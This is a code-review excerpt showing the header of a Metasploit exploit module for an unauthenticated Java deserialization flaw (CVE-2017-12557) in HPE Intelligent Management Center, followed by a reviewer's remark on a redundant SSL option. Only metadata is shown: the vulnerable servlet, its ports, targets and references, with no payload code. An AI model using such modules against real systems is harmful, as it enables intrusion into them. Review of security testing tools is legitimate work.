modules/exploits/windows/http/hp_imc_java_deserialize.rb

```diff
@@ -0,0 +1,137 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Powershell
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "HP Intelligent Management Java Deserialization RCE",
+      'Description'    => %q{
+        This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of
+        Hewlett Packard Enterprise Intelligent Management Center. Authentication is not required to exploit
+        this vulnerability.
+
+        The specific flaw exists within the WebDMDebugServlet, which listens on TCP ports 8080 and 8443 by
+        default. The issue results from the lack of proper validation of user-supplied data, which can result
+        in deserialization of untrusted data. An attacker can leverage this vulnerability to execute arbitrary
+        code in the context of SYSTEM.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+            'Steven Seeley (mr_me) of Offensive Security',          # Discovery
+            'Carsten @MaartmannMoe / cmm[at]transcendentgroup.com'  # Metasploit module
+        ],
+      'References'     =>
+        [
+            ['CVE', '2017-12557'],
+            ['URL', 'https://github.com/pimps/ysoserial-modified/blob/master/src/main/java/ysoserial/payloads/JSON1.java'],
+            ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-17-832/']
+        ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+            [ 'HPE IMC 7.3 E0504P2 and earlier / Windows', {} ]
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => "Oct 3 2017",
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {
+            'SSL'      => false
```

Comment:
`SSL` as `false` is the default. This probably doesn't need to be defined as a default option. It's fine to leave it in, but your indentation is slightly off ;)